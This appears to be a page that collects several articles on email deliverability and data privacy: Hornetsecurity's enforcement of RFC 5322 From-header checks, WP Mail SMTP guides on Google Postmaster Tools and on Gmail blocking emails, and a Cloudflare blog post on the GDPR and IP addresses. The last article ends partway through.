Enhancing RFC-compliance for message header from addresses

06/02/2024

Hornetsecurity is implementing an update to enhance email security by enforcing checks on the “Header-From” value in emails, as per RFC 5322 standards.
This initiative is driven by several key reasons:

  1. Preventing Email Delivery Issues: Historically, not enforcing the validity of the originator email address has led to emails being accepted by our system but ultimately rejected by the final destination, especially with most customers now using cloud email service providers that enforce stricter validation.
  2. Enhanced Protection Against Spoofed Emails: By strictly validating the “Header-From” value, we aim to significantly reduce the risk of email spoofing.
  3. Enhancing Email Authentication for DKIM/DMARC Alignment: By enforcing RFC 5322 compliance in the “Header-From” field, we can ensure better alignment with DKIM and DMARC standards, thereby significantly improving the security and authenticity of email communications.

The cause of malformed “From” headers often stems from incorrect email server configurations by the sender or from bugs in scripts or other applications. Our new protocol aims to rectify these issues, ensuring that all emails passing through our system are fully compliant with established standards, thus improving the overall security and reliability of email communications.

Implementation Timeline

  • Stage 1 (Starting 4 March 2024): 1-5% of invalid emails will be rejected.
  • Stage 2 (Second week): 30% rejection rate.
  • Stage 3 (Third week): 60% rejection rate.
  • Final Stage (By the end of the fourth week): 100% rejection rate.

Impact Assessment

Extensive testing over the past six months indicates that the impact on legitimate email delivery is expected to be minimal. However, email administrators should be prepared for potential queries from users experiencing email rejections.

Handling Rejections

When an email is rejected due to a malformed “Header-From”, the sender will receive a bounce-back message with the error “510 5.1.7 malformed Header-From according to RFC 5322”. This message indicates that the email did not meet the necessary header standards.

Identifying Affected Emails

Email administrators can identify affected emails in the Hornetsecurity Control Panel (https://cp.hornetsecurity.com) using the following steps:

  1. Navigate to ELT in the Hornetsecurity Control Panel.
  2. Select your tenant in the top right field.
  3. Choose a date range for your search. A shorter range will yield quicker results.
  4. Click in the “Search” text box, select the “Msg ID” parameter, and type in “hfromfailed” (exact string).
  5. Press ENTER to perform the search.

When email administrators identify emails affected by the “Header-From” checks in the Email Live Tracking (ELT) system, they should promptly verify that the sending application or server is configured to produce RFC 5322-compliant headers. This will help maintain email flow integrity.


Defining Exceptions

In implementing the new “Header-From” checks, Hornetsecurity recognizes the need for flexibility in certain cases. Therefore, we have provisioned for the definition of exceptions to these checks.

This section details how to set up these exceptions and the timeline for their deprecation:

Configuring Exceptions

  1. Accessing the Control Panel: Log in to the Hornetsecurity Control Panel at https://cp.hornetsecurity.com.
  2. Navigating to the Compliance Filter.
  3. Creating Exception Rules: Within the Compliance Filter, you can create rules that define exceptions to the “Header-From” checks. These should be based on the envelope sender address.
  4. Applying the Exceptions: Once defined, these exceptions will allow certain emails to bypass the strict “Header-From” checks.

Timeline for Deprecation of Exceptions applied to the new Header-From checks

  • Initial Implementation: The ability to define exceptions is available as part of the initial rollout of the “Header-From” checks.
  • Deprecation Date: These exception provisions are set to be deprecated by the end of June 2024.

The provision for exceptions is intended as a temporary measure to facilitate a smoother transition to the new protocol. By June 2024, all email senders are expected to have had sufficient time to align their email systems with RFC 5322 standards. Deprecating the exceptions is a step toward ensuring full compliance and maximizing the security benefits of the “Header-From” checks.

Conclusion

The enhancement of our RFC-compliance is a significant step toward securing email communications. Adherence to these standards will collectively reduce risks associated with email. For further assistance or clarification, please reach out to our support team at support@hornetsecurity.com.


Invalid “Header From” Examples:

  • From: <>
    Blank addresses are problematic as they cause issues in scenarios requiring a valid email address, such as allow and deny lists.
  • From: John Doe john.doe@hornetsecurity.com
    Non-compliant with RFC standards. The email address must be enclosed in angle brackets (< and >) when accompanied by a display name.
  • From: “John Doe” <john.doe@hornetsecurity.com> (Peter’s cousin)
    While technically RFC-compliant, such formats are often rejected by M365 unless explicit exceptions are configured. We do accept certain email addresses with comments.
  • From: John, Doe <john.doe@hornetsecurity.com>
    Non-compliant with RFC standards. A display name containing a comma must be enclosed in double quotes.
  • From: “John Doe <john.doe@hornetsecurity.com>”
    Non-compliant with RFC standards. The entire “From” value is incorrectly enclosed in double quotation marks, which is not allowed.
  • From: “John Doe <john.doe@hornetsecurity.com>” john.doe@hornetsecurity.com
    Non-compliant with RFC standards. The display name is present, but the email address is not correctly enclosed in angle brackets.
  • From: “John Doe”<john.doe@hornetsecurity.com>
    Non-compliant with RFC standards due to the absence of white-space between the display name and the email address.
  • From: “Nested Brackets” <<info@hornetsecurity.com>
    Nested angle brackets are not allowed in the “addr-spec” part of the email address.
  • From: Peter Martin <e14011>
    Non-compliant with RFC standards. The domain part of the email address (“addr-spec”) is missing.
  • From: “News” <news.@hornetsecurity.com>
    Non-compliant with RFC standards. The local part of the email address must not end with a dot.
  • Missing “From” header altogether
    A “From” header is mandatory in emails. The absence of this header is a clear violation of RFC standards.

Valid “Header From” Examples:

  • From: john.doe@hornetsecurity.com
    RFC-compliant.
  • From: <john.doe@hornetsecurity.com>
    RFC-compliant.
  • From: “Doe, John” <john.doe@hornetsecurity.com>
    RFC-compliant.
  • From: “John Doe” <john.doe@hornetsecurity.com>
    RFC-compliant.
  • From: < john.doe@hornetsecurity.com >
    RFC-compliant, but not recommended because of the spaces between the email address and the angle brackets.
  • From: John Doe <john.doe@hornetsecurity.com>
    Acceptable, although it is recommended that the display name be enclosed in double quotes if it contains any white-space.
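If you want to pre-check the “From” headers your own application generates against the cases above, one option is a short script built on Python’s standard-library RFC 5322 parser. This is a minimal sketch, not Hornetsecurity’s validator, and exactly which malformed values surface as parse defects can vary by Python version, so treat it as a smoke test rather than an authoritative check:

    from email.headerregistry import HeaderRegistry

    # HeaderRegistry applies the RFC 5322 grammar to structured headers.
    registry = HeaderRegistry()

    samples = [
        "john.doe@hornetsecurity.com",                # valid
        '"Doe, John" <john.doe@hornetsecurity.com>',  # valid: comma inside quotes
        "John, Doe <john.doe@hornetsecurity.com>",    # invalid: unquoted comma
        '"John Doe <john.doe@hornetsecurity.com>"',   # invalid: whole value quoted
    ]

    for value in samples:
        header = registry("From", value)  # parse the value as a From header
        verdict = "looks OK" if not header.defects else f"defects: {header.defects}"
        print(f"{value} -> {verdict}")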

Source :
https://support.hornetsecurity.com/hc/en-us/articles/22036971529617-Enhancing-RFC-compliance-for-message-header-from-addresses

How to Set Up Google Postmaster Tools

Updated: Jan 31, 2024, 13:03
By Claire Broadley Content Manager
REVIEWED By Jared Atchison Co-owner

Do you want to set up Postmaster Tools… but you’re not sure where to start?

Postmaster Tools lets you monitor your spam complaints and domain reputation. That’s super important now that Gmail is blocking emails more aggressively.

Thankfully, Postmaster Tools is free and easy to configure. If you’ve already used a Google service like Analytics, it’ll take just a couple of minutes to set up.


Who Needs Postmaster Tools?

You should set up Postmaster Tools if you meet any of the following criteria:

1. You Regularly Send Emails to Gmail Recipients

Postmaster Tools is a tool that Google provides to monitor emails to Gmail users.

Realistically, most of your email lists are likely to include a large number of Gmail mailboxes unless you’re sending to a very specific group of people, like an internal company mailing list. (According to Techjury, Gmail had a 75.8% share of the email market in 2023.)

Keep in mind that Gmail recipients aren’t always using Gmail email addresses. People who use custom domains or Google Workspace are ‘hidden’, so it’s not always clear who’s using Gmail and who isn’t. To be on the safe side, it’s best to set up Postmaster Tools anyway (it’s free).

2. You Send Marketing Emails (or Have a Large Website)

Postmaster Tools works best for bulk email senders, which Google defines as domains that send more than 5,000 emails a day.

If you’re sending email newsletters on a regular basis, having Postmaster Tools is going to help.

Likewise, if you use WooCommerce or a similar platform, you likely send a high number of transactional emails: password reset emails, receipts, and so on.

Reset password email

If you don’t send a large number of emails right now, you can still set up Postmaster Tools so you’re prepared for the time you might.

Just note that you may see the following message:

No data to display at present. Please come back later.
Postmaster Tools requires your domain to satisfy certain conditions before data is visible for this chart.

This usually means you’re not sending enough emails for Google to be able to calculate meaningful statistics.

It’s up to you if you want to set it up anyway, or skip it until your business grows a little more.

How to Add a Domain to Postmaster Tools

Adding a domain to Postmaster Tools is simple and should take less than 10 minutes.

To get started, head to the Postmaster Tools site and log in. If you’re already using Google Analytics, sign in using the email address you use for your Analytics account.

The welcome popup will already be open. Click on Get Started to begin.

Add a domain in Postmaster Tools

Next, enter the domain name that your emails come from.

This should be the domain you use as the sender, or the ‘from email’, when you’re sending emails from your domain. It will normally be your main website.

Enter domain name in Postmaster Tools

If your domain name is already verified for another Google service, that’s all you need to do! You’ll see confirmation that your domain is set up.

Domain added to Google Postmaster Tools

If you haven’t used this domain with Google services before, you’ll need to verify it. Google will ask you to add a TXT record to your DNS.

Postmaster Tools domain verification

To complete this, head to the control panel for the company you bought your domain from. It’ll likely be your domain name registrar or your web host. If you’re using a service like Cloudflare, you’ll want to open up your DNS records there instead.

Locate the part of the control panel that handles your DNS (which might be called a DNS Zone) and add a new TXT record. Copy the record provided into the fields.

Note: Most providers will ask you to enter a Name, which isn’t shown in Google’s instructions. If your provider doesn’t fill this out by default, you can safely enter @ in the Name field.

Verify domain by adding TXT record for Google Postmaster Tools
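Filled out, the finished record usually looks something like this (the token below is a placeholder; copy the exact string Google shows you):

    Type:  TXT
    Name:  @
    Value: google-site-verification=<token provided by Google>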

Now save your record and wait a few minutes. Changes in Cloudflare can be near-instant, but other registrars or hosts may take longer.

After waiting for your change to take effect, switch back to Postmaster Tools and hit Verify to continue.

Verify domain in Postmaster Tools

And that’s it! Now your domain has been added to Postmaster Tools.

Verified domain in Postmaster Tools

How to Read the Charts in Google Postmaster Tools

Google is now tracking various aspects of your email deliverability. It’ll display the data in a series of charts in your account.

Here’s a quick overview of what you can see.

As I mentioned, keep in mind that the data here is only counted from Gmail accounts. It’s not a domain-wide measurement of everything you send.

Spam Rate

Your spam rate is the percentage of your delivered emails that recipients report as spam each day; for example, 10 complaints against 10,000 delivered emails is a rate of 0.1%. You should aim to keep this below 0.1%.

You can do that by making it easy for people to unsubscribe from marketing emails and using double opt-ins rather than single opt-ins.

Example of a Postmaster Tools report for Gmail recipients

It’s normal for spam complaint rates to spike occasionally because Google measures each day in isolation.

If you’re seeing a spam rate that is consistently above 0.3%, it’s worth looking into why that’s happening. You might be sending emails to people who don’t want to receive them.

IP Reputation

IP reputation is the trustworthiness of the IP address your emails come from. Google may mark emails as spam if your IP reputation is poor.

IP reputation in Postmaster Tool

Keep in mind that IP reputation is tied to your email marketing provider. It’s a measure of their IP as well as yours.

If you see a downward trend, check in with the platform you’re using to ask if they’re seeing the same thing.

Domain Reputation

Domain reputation is the trustworthiness of the domain name you’ve verified in Postmaster Tools. This can be factored into Google’s spam scoring, along with other measurements.

Domain reputation in Postmaster Tools

The ideal scenario is a consistent rating of High, as shown in our screenshot above.

Wait: What is IP Reputation vs Domain Reputation?

You’ll now see that Google has separate options for IP reputation and domain reputation. Here’s the difference:

  • IP reputation measures the reputation of the server that actually sends your emails out. This might be a service like Constant Contact, ConvertKit, or Drip. Other people who use the service will share the same IP, so you’re a little more vulnerable to the impact of other users’ actions.
  • Domain reputation is a measure of the emails that are sent from your domain name as a whole.

Feedback Loop

High-volume or bulk senders can activate this feature to track spam complaints in more detail. You’ll need a special email header called Feedback-ID if you want to use this. Most likely, you won’t need to look at this report.
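For reference, the header takes the general shape shown below: up to three optional identifiers of your choosing, followed by a required sender identifier. All values here are placeholders:

    Feedback-ID: campaign-123:customer-456:newsletter:examplesender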

Authentication

This chart shows you how many emails cleared security checks.

In more technical terms, it shows how many emails attempted to authenticate using DMARC, SPF, and DKIM vs. how many actually did.

Postmaster Tools authentication

Encryption

This chart looks very similar to the domain reputation chart we already showed. It should sit at 100%.

If you’re seeing a lower percentage, you may be using outdated connection details for your email provider.

Check the websites or platforms that are sending emails from your domain and update them from an SSL connection to a TLS connection.

wp mail smtp host and port settings

Delivery Errors

Last but not least, the final chart is the most useful. The Delivery Errors report will show you whether emails were rejected or temporarily delayed. A temporary delay is labeled as a TempFail in this report.

This chart is going to tell you whether Gmail is blocking your emails, and if so, why.

If you see any jumps, click on the point in the chart and the reason for the failures will be displayed below it.

Delivery errors in Postmaster Tools

Small jumps here and there are not a huge cause for concern. However, very large error rates are a definite red flag. You may have received a 550 error or a 421 error that gives you more clues as to why they’re happening.

Here are the 3 most important error messages related to blocked emails in Gmail:

421-4.7.0 unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been temporarily rate limited.

550-5.7.1 Our system has detected an unusual rate of unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been blocked.

550-5.7.26 This mail is unauthenticated, which poses a security risk to the sender and Gmail users, and has been blocked. The sender must authenticate with at least one of SPF or DKIM. For this message, DKIM checks did not pass and SPF check for example.com did not pass with ip: 192.186.0.1.

If you’re seeing these errors, check that your domain name has the correct DNS records for authenticating email. It’s also a good idea to examine your emails to ensure you have the right unsubscribe links in them.

Note: WP Mail SMTP preserves the list-unsubscribe headers that your email provider adds. That means that your emails will have a one-click unsubscribe option at the top.

One click unsubscribe link

If you’re using a different SMTP plugin, make sure it’s preserving that crucial list-unsubscribe header. If it’s not, you may want to consider switching to WP Mail SMTP for the best possible protection against spam complaints and failed emails.

Fix Your WordPress Emails Now

Next, Authenticate Emails from WordPress

Are your emails from WordPress disappearing or landing in the spam folder? You’re definitely not alone. Learn how to authenticate WordPress emails and ensure they always land in your inbox.

Ready to fix your emails? Get started today with the best WordPress SMTP plugin. If you don’t have the time to fix your emails, you can get full White Glove Setup assistance as an extra purchase, and there’s a 14-day money-back guarantee for all paid plans.

If this article helped you out, please follow us on Facebook and Twitter for more WordPress tips and tutorials.

Source :
https://wpmailsmtp.com/how-to-set-up-google-postmaster-tools/

Reflecting on the GDPR to celebrate Privacy Day 2024

26/01/2024
Emily Hancock

10 min read

This post is also available in Deutsch, Français, 日本語 and Nederlands.


Just in time for Data Privacy Day 2024 on January 28, the EU Commission is calling for evidence to understand how the EU’s General Data Protection Regulation (GDPR) has been functioning now that we’re nearing the 6th anniversary of the regulation coming into force.

We’re so glad they asked, because we have some thoughts. And what better way to celebrate privacy day than by discussing whether the application of the GDPR has actually done anything to improve people’s privacy?

The answer is, mostly yes, but in a couple of significant ways – no.

Overall, the GDPR is rightly seen as the global gold standard for privacy protection. It has served as a model for what data protection practices should look like globally, it enshrines data subject rights that have been copied across jurisdictions, and when it took effect, it created a standard for the kinds of privacy protections people worldwide should be able to expect and demand from the entities that handle their personal data. On balance, the GDPR has definitely moved the needle in the right direction for giving people more control over their personal data and in protecting their privacy.

In a couple of key areas, however, we believe the way the GDPR has been applied to data flowing across the Internet has done nothing for privacy and in fact may even jeopardize the protection of personal data. The first area where we see this is with respect to cross-border data transfers. Location has become a proxy for privacy in the minds of many EU data protection regulators, and we think that is the wrong result. The second area is an overly broad interpretation of what constitutes “personal data” by some regulators with respect to Internet Protocol or “IP” addresses. We contend that IP addresses should not always count as personal data, especially when the entities handling IP addresses have no ability on their own to tie those IP addresses to individuals. This is important because the ability to implement a number of industry-leading cybersecurity measures relies on the ability to do threat intelligence on Internet traffic metadata, including IP addresses.  

Location should not be a proxy for privacy

Fundamentally, good data security and privacy practices should be able to protect personal data regardless of where that processing or storage occurs. Nevertheless, the GDPR is based on the idea that legal protections should attach to personal data based on the location of the data – where it is generated, processed, or stored. Articles 44 to 49 establish the conditions that must be in place in order for data to be transferred to a jurisdiction outside the EU, with the idea that even if the data is in a different location, the privacy protections established by the GDPR should follow the data. No doubt this approach was influenced by political developments around government surveillance practices, such as the revelations in 2013 of secret documents describing the relationship between the US NSA (and its Five Eyes partners) and large Internet companies, and that intelligence agencies were scooping up data from choke points on the Internet. And once the GDPR took effect, many data regulators in the EU were of the view that as a result of the GDPR’s restrictions on cross-border data transfers, European personal data simply could not be processed in the United States in a way that would be consistent with the GDPR.

This issue came to a head in July 2020, when the Court of Justice of the European Union (CJEU), in its “Schrems II” decision[1], invalidated the EU-US Privacy Shield adequacy standard and questioned the suitability of the EU standard contractual clauses (a mechanism entities can use to ensure that GDPR protections are applied to EU personal data even if it is processed outside the EU). The ruling in some respects left data protection regulators with little room to maneuver on questions of transatlantic data flows. But while some regulators were able to view the Schrems II ruling in a way that would still allow for EU personal data to be processed in the United States, other data protection regulators saw the decision as an opportunity to double down on their view that EU personal data cannot be processed in the US consistent with the GDPR, therefore promoting the misconception that data localization should be a proxy for data protection.

In fact, we would argue that the opposite is the case. From our own experience and according to recent research[2], we know that data localization threatens an organization’s ability to achieve integrated management of cybersecurity risk and limits an entity’s ability to employ state-of-the-art cybersecurity measures that rely on cross-border data transfers to make them as effective as possible. For example, Cloudflare’s Bot Management product only increases in accuracy with continued use on the global network: it detects and blocks traffic coming from likely bots before feeding back learnings to the models backing the product. A diversity of signal and scale of data on a global platform is critical to help us continue to evolve our bot detection tools. If the Internet were fragmented – preventing data from one jurisdiction being used in another – more and more signals would be missed. We wouldn’t be able to apply learnings from bot trends in Asia to bot mitigation efforts in Europe, for example. And if the ability to identify bot traffic is hampered, so is the ability to block those harmful bots from services that process personal data.

The need for industry-leading cybersecurity measures is self-evident, and it is not as if data protection authorities don’t realize this. If you look at any enforcement action brought against an entity that suffered a data breach, you see data protection regulators insisting that the impacted entities implement ever more robust cybersecurity measures in line with the obligation GDPR Article 32 places on data controllers and processors to “develop appropriate technical and organizational measures to ensure a level of security appropriate to the risk”, “taking into account the state of the art”. In addition, data localization undermines information sharing within industry and with government agencies for cybersecurity purposes, which is generally recognized as vital to effective cybersecurity.

In this way, while the GDPR itself lays out a solid framework for securing personal data to ensure its privacy, the application of the GDPR’s cross-border data transfer provisions has twisted and contorted the purpose of the GDPR. It’s a classic example of not being able to see the forest for the trees. If the GDPR is applied in such a way as to elevate the priority of data localization over the priority of keeping data private and secure, then the protection of ordinary people’s data suffers.

Applying data transfer rules to IP addresses could lead to balkanization of the Internet

The other key way in which the application of the GDPR has been detrimental to the actual privacy of personal data is related to the way the term “personal data” has been defined in the Internet context – specifically with respect to Internet Protocol or “IP” addresses. A world where IP addresses are always treated as personal data and therefore subject to the GDPR’s data transfer rules is a world that could come perilously close to requiring a walled-off European Internet. And as noted above, this could have serious consequences for data privacy, not to mention that it likely would cut the EU off from any number of global marketplaces, information exchanges, and social media platforms.

This is a bit of a complicated argument, so let’s break it down. As most of us know, IP addresses are the addressing system for the Internet. When you send a request to a website, send an email, or communicate online in any way, IP addresses connect your request to the destination you’re trying to access. These IP addresses are the key to making sure Internet traffic gets delivered to where it needs to go. As the Internet is a global network, this means it’s entirely possible that Internet traffic – which necessarily contains IP addresses – will cross national borders. Indeed, the destination you are trying to access may well be located in a different jurisdiction altogether. That’s just the way the global Internet works. So far, so good.

But if IP addresses are considered personal data, then they are subject to data transfer restrictions under the GDPR. And with the way those provisions have been applied in recent years, some data regulators were getting perilously close to saying that IP addresses cannot transit jurisdictional boundaries if it meant the data might go to the US. The EU’s recent approval of the EU-US Data Privacy Framework established adequacy for US entities that certify to the framework, so these cross-border data transfers are not currently an issue. But if the Data Privacy Framework were to be invalidated as the EU-US Privacy Shield was in the Schrems II decision, then we could find ourselves in a place where the GDPR is applied to mean that IP addresses ostensibly linked to EU residents can’t be processed in the US, or potentially not even leave the EU.

If this were the case, then providers would have to start developing Europe-only networks to ensure IP addresses never cross jurisdictional boundaries. But how would people in the EU and US communicate if EU IP addresses can’t go to the US? Would EU citizens be restricted from accessing content stored in the US? It’s an application of the GDPR that would lead to the absurd result – one surely not intended by its drafters. And yet, in light of the Schrems II case and the way the GDPR has been applied, here we are.

A possible solution would be to consider that IP addresses are not always “personal data” subject to the GDPR. In 2016 – even before the GDPR took effect – the CJEU established the view in Breyer v. Bundesrepublik Deutschland that even dynamic IP addresses, which change with every new connection to the Internet, constituted personal data if an entity processing the IP address could link the IP addresses to an individual. While the court’s decision did not say that dynamic IP addresses are always personal data under European data protection law, that’s exactly what EU data regulators took from the decision, without considering whether an entity actually has a way to tie the IP address to a real person[3].

The question of when an identifier qualifies as “personal data” is again before the CJEU: In April 2023, the lower EU General Court ruled in SRB v EDPS[4] that transmitted data can be considered anonymised and therefore not personal data if the data recipient does not have any additional information reasonably likely to allow it to re-identify the data subjects and has no legal means available to access such information. The appellant – the European Data Protection Supervisor (EDPS) – disagrees. The EDPS, who mainly oversees the privacy compliance of EU institutions and bodies, is appealing the decision and arguing that a unique identifier should qualify as personal data if that identifier could ever be linked to an individual, regardless of whether the entity holding the identifier actually had the means to make such a link.

If the lower court’s common-sense ruling holds, one could argue that IP addresses are not personal data when those IP addresses are processed by entities like Cloudflare, which have no means of connecting an IP address to an individual. If IP addresses are then not always personal data, then IP addresses will not always be subject to the GDPR’s rules on cross-border data transfers.

Although it may seem counterintuitive, having a standard whereby an IP address is not necessarily “personal data” would actually be a positive development for privacy. If IP addresses can flow freely across the Internet, then entities in the EU can use non-EU cybersecurity providers to help them secure their personal data. Advanced Machine Learning/predictive AI techniques that look at IP addresses to protect against DDoS attacks, prevent bots, or otherwise guard against personal data breaches will be able to draw on attack patterns and threat intelligence from around the world to the benefit of EU entities and residents. But none of these benefits can be realized in a world where IP addresses are always personal data under the GDPR and where the GDPR’s data transfer rules are interpreted to mean IP addresses linked to EU residents can never flow to the United States.

Keeping privacy in focus

On this Data Privacy Day, we urge EU policy makers to look closely at how the GDPR is working in practice, and to take note of the instances where the GDPR is applied in ways that place privacy protections above all other considerations – even appropriate security measures mandated by the GDPR’s Article 32 that take into account the state of the art of technology. When this happens, it can actually be detrimental to privacy. If taken to the extreme, this formulaic approach would not only negatively impact cybersecurity and data protection, but even put into question the functioning of the global Internet infrastructure as a whole, which depends on cross-border data flows. So what can be done to avert this?

First, we believe EU policymakers could adopt guidelines (if not legal clarification) for regulators that IP addresses should not be considered personal data when they cannot be linked by an entity to a real person. Second, policymakers should clarify that the GDPR’s application should be considered with the cybersecurity benefits of data processing in mind. Building on the GDPR’s existing recital 49, which rightly recognizes cybersecurity as a legitimate interest for processing, personal data that needs to be processed outside the EU for cybersecurity purposes should be exempted from GDPR restrictions to international data transfers. This would avoid some of the worst effects of the mindset that currently views data localization as a proxy for data privacy. Such a shift would be a truly pro-privacy application of the GDPR.

[1] Case C-311/18, Data Protection Commissioner v Facebook Ireland and Maximillian Schrems.
[2] Swire, Peter and Kennedy-Mayo, DeBrae and Bagley, Andrew and Modak, Avani and Krasser, Sven and Bausewein, Christoph, Risks to Cybersecurity from Data Localization, Organized by Techniques, Tactics, and Procedures (2023).
[3] Different decisions by the European data protection authorities, namely the Austrian DSB (December 2021), the French CNIL (February 2022) and the Italian Garante (June 2022), while analyzing the use of Google Analytics, have rejected the relative approach used by the Breyer case and considered that an IP address should always be considered as personal data. Only the decision issued by the Spanish AEPD (December 2022) followed the same interpretation of the Breyer case. In addition, see paragraphs 109 and 136 in Guidelines by Supervisory Authorities for Tele-Media Providers, DSK (2021).
[4] Single Resolution Board v EDPS, Court of Justice of the European Union, April 2023.

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/reflecting-on-the-gdpr-to-celebrate-privacy-day-2024/

Gmail Blocking Your Emails? Here’s How to Fix It (Feb 2024)

Updated: Jan 22, 2024, 15:17
By Claire Broadley Content Manager
REVIEWED By Jared Atchison President and co-owner

Is Gmail blocking emails that you send? You’re not alone.

Google has always been strict in blocking rogue senders in its fight against spam.

In 2024, it’s tightening up the rules and enforcing stricter anti-spam limits. That means emails you send to Gmail mailboxes won’t arrive if you’re not compliant.

The volume of spam email that Google’s servers deal with is mind-bogglingly huge. About half of all emails sent daily are spam, and according to The Tech Report, about 1.8 billion people use Gmail. Google has a vested interest in keeping spam out of its customers’ inboxes.

This article explains who’s impacted by Google’s new sending requirements, what exactly will change this year, and what you need to do to ensure your emails are delivered.

Fix Your WordPress Emails Now


Why Is Gmail Blocking My Emails?

Gmail is likely blocking your emails for one of 2 reasons. Either you’re on a spam blacklist already, or you don’t comply with its new requirements for bulk senders.

Reason 1. Google Put Your Domain On a Spam Blacklist

It only takes a few people to click Mark as Spam in Gmail for your domain reputation to be impacted. This can result in Gmail adding your domain to a blacklist if the spam complaints build up.

Once you’re on a blacklist, you’ll have to earn the trust of email providers to be removed.


“Getting off a blacklist is often not a straightforward task. It’s usually not just a case of requesting your removal – you’ll also have to show what you’ve done to resolve the issues that led to your blacklisting in the first place.”

-Rachel Adnyana, Email Deliverability Expert at SendLayer

Blacklists are not new, but the threshold for being added to one is lower than it once was.

The telltale sign that you’re on a blacklist is an error like this:

421-4.7.0 unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been temporarily rate limited.

550-5.7.1 Our system has detected an unusual rate of unsolicited mail originating from your IP address. To protect our users from spam, mail sent from your IP address has been blocked.

You may see a different 5xx error when sending an email if you’re impacted by this. You can look through the SendLayer error library if you see an error you don’t understand.

If you don’t see errors, try running your domain name or sender IP through the blacklist checker at MXToolbox:

Stop WordPress emails going to spam with blacklist check
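If you’d rather script a quick check, the sketch below shows a manual DNSBL lookup. It assumes the third-party dnspython package and uses Spamhaus ZEN as an example list (check each list’s usage policy before querying it programmatically):

    import dns.resolver

    def is_listed(ip: str, dnsbl: str = "zen.spamhaus.org") -> bool:
        # DNSBLs are queried by reversing the IP's octets and appending the zone.
        query = ".".join(reversed(ip.split("."))) + "." + dnsbl
        try:
            dns.resolver.resolve(query, "A")
            return True  # any A record in the response means the IP is listed
        except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
            return False

    print(is_listed("203.0.113.10"))  # documentation IP; substitute your sender IP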

We’ll explain how you can resolve this problem in just a minute. First, let’s look at the other possible cause of emails to Gmail being blocked.

Reason 2. Your Emails Aren’t Authenticated

Emails are often sent without authentication, but they are sometimes delivered anyway.

If you have a WordPress website, it’ll send emails without authentication by default. You will likely find them in your spam folder.

Gmail contact form entry in spam folder

Some Gmail users will find their contact form emails don’t arrive at all.

As email providers become less tolerant of unauthenticated emails, we’re seeing more support tickets from customers whose WordPress emails go to spam. Some say they used to be delivered, but now aren’t. It’s confusing when this happens. “I didn’t change anything, so why did my emails stop sending?”

It’s not that your website changed. It’s more likely that the rules for detecting spam got tougher. Soon, senders who don’t authenticate their emails will be blocked from emailing Gmail recipients at all.

The telltale sign is an error like this:

550-5.7.26 This mail is unauthenticated, which poses a security risk to the sender and Gmail users, and has been blocked. The sender must authenticate with at least one of SPF or DKIM. For this message, DKIM checks did not pass and SPF check for example.com did not pass with ip: 192.186.0.1.

You can see more details about error 550-5.7.26 in the SendLayer error library.

As you can see, Google is cracking down on domains that don’t have SPF, DMARC, and DKIM configured. If you’re not sure what that means, I’ll explain more in the next section.

Who Do Gmail’s New Rules Apply To?

Initially, the SPF, DMARC, and DKIM requirement will apply to bulk senders. Google defines a bulk sender as a domain that has, at some point, sent more than 5,000 emails to Gmail recipients in a single day.

  • ‘Gmail recipients’ means anyone with an email ending @gmail.com or @googlemail.com, and people who are using custom domains or Google Workspace to receive emails.
  • You only need to send 5,000 emails once to be considered a bulk sender forever. Remember: this applies to all emails you send from your domain.

Email authentication is best practice and should be set up to maintain good deliverability — even if you’re not considered a bulk sender.

How to Stop Gmail Blocking Your Emails

Now to the important part. How do you stop Gmail blocking the emails you send?

Email deliverability issues can seriously harm your business. If you use Google Workspace, they could even prevent you from sending emails to your own employees.

If your newsletters are considered to be spam, and people mark them as such, that could mean your purchase receipts don’t get through in the future.

No matter why Gmail is blocking your emails, the solutions are the same. First, let’s set up a free reporting tool so you can see your email spam complaints.

1. Set Up Google Postmaster Tools (Bulk Senders)

Google Postmaster Tools is a free tool that will show you exactly what your spam complaint rate is.

If you send a large number of emails, it’s worth creating an account because it will allow you to understand your current standing with Gmail.

You’ll need to authenticate your domain before your spam complaint rate appears. If you’ve already authenticated it for services like Google Analytics, you may find that setup is almost instant.

Verified domain in Postmaster Tools

If you see any spikes in Postmaster Tools’ spam reporting, or you’re consistently maintaining a level of spam complaints over 0.1%, you might not be able to send emails to Gmail recipients (and that includes customers on Google Workspace).

The absolute maximum spam complaint rate that Google will tolerate is 0.3%.

Example of a Postmaster Tools report for Gmail recipients

If your spam complaints are trending higher, it’s a sign you need to get to the bottom of the causes. People could be marking emails as spam for all kinds of reasons, but here are a few that Google has specifically highlighted:

  • You might be sending emails to people who are not expecting to receive them.

Padding your mailing list to inflate its size can be tempting. After all, you’ll cast a wider net when you send out a marketing email.

But it could hurt your deliverability too. More people will mark your emails as spam if you don’t give them any choice.

  • You might not be making it easy for people to unsubscribe.

You need to have a way for people to unsubscribe from your emails. You also need to implement a one-click list-unsubscribe header if your email marketing platform supports that.

  • People could be sending spam through your website forms.

This is surprisingly common. If you don’t protect your contact form from spam, the junk email that passes through it hurts your deliverability because it appears to come from your domain.

  • You have a security issue on your website and you’re spamming people without even knowing.

In WordPress, there are a few common causes of poor security:

  • Poor security on your WordPress admin account, meaning your passwords are easy to guess and other people can get into your dashboard.
  • Nulled plugins, which can contain malicious code, including code that sends spam or phishing emails.
  • Poor security on your hosting account; for example, if you have a VPS, you need to watch out for hackers getting access and setting up SMTP relays that blast out emails without you knowing.

All in all, this is about keeping a close eye on what you’re sending and who you’re sending to.

2. Authenticate Emails From WordPress

If you’re still using WordPress without an SMTP plugin, we highly recommend that you install one to stop messages to Gmail from being blocked.

WP Mail SMTP steps in to handle all outgoing email from your WordPress site, routing it through a proper email provider. That authenticates the emails and stops them from being blocked.

WP Mail SMTP is easy to set up thanks to the Setup Wizard, and it supports many popular email platforms.

Choosing a mailer in the WP Mail SMTP setup wizard

You can also purchase the additional plugin setup service if you need a hand getting your email authentication working.

Add White Glove Setup

The Pro version of WP Mail SMTP is worth it because it adds lots of useful email logging and routing features. But if you just need to fix blocked emails to Gmail, the free version of WP Mail SMTP will do that.

Read more about setting up WordPress emails with authentication using WP Mail SMTP.

3. Implement DKIM, DMARC, and SPF

We already talked about issues that can arise without proper authentication.

